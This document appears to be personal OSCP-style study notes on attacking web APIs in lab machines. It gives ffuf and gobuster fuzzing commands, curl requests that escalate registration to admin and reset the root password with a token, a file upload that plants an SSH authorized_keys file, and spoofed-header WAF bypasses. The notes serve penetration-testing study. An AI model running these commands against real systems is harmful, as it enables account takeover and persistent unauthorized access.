// notes/ Web Exploitation
🕸️

Apis

Notes from oscp.adot8.com — web applications.

#web applications#adot8
source · oscp.adot8.com · web-applications/apis

APIs

Fuzzing APIs

code
01/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
code
01ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/login/v1?FUZZ=1
code
01ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/?FUZZ=1

{% hint style="info" %} Burp could also be used with Intruder + Sniper {% endhint %}

Rest APIs

APIs usually follow the format of /api_name/v1 , we can enumerate using a gobuster pattern

code
01gobuster dir -w directories.txt -p apis_patt.txt -u http://192.168.205.249:33414/ -t100

Inspecting the API

<pre><code>curl -i http://192.168.205.249:33414/help <strong>curl http://192.168.205.249:33414/help | python -m json.tool </strong></code></pre>

{% hint style="info" %} You should dir bust all api paths you find {% endhint %}

Posting to an API

curl -d '{"user":"admin", "password":"test"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/login/v1

curl -d '{"user":"admin", "password":"test", "admin":"True"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/register/v1

Example: Changing root account password

curl
'http://192.168.50.16:33414/user/v1/root/password'
-H 'Content-Type: application/json'
-H 'Authorization: OAuth eyJ0eXAiOiJKV1Q
-d '{"password": "adot8"}'

curl -X 'PUT'
'http://192.168.50.16:33414/users/v1/root/password'
-H 'Content-Type: application/json'
-H 'Authorization: OAuth eyJ0eXAiOiJKV1Q'
-d '{"password": "adot8"}'

Uploading Files

code
01curl http://192.168.205.249:33414/file-upload -i -L -X POST -H "Content-type: multipart/form-data" -F file="@$(pwd)/authorized_keys.txt" -F filename='/home/alfredo/.ssh/authorized_keys'

WAF Bypass

Add the X-Forwarded-For: 127.0.0.1 header to the request.

code
01curl http://192.168.214.134:13337/logs -H 'X-Forwarded-For: 127.0.0.1'
code
01X-Originating-IP: 127.0.0.1
02X-Forwarded-For: 127.0.0.1
03X-Remote-IP: 127.0.0.1
04X-Remote-Addr: 127.0.0.1
05X-Client-IP: 127.0.0.1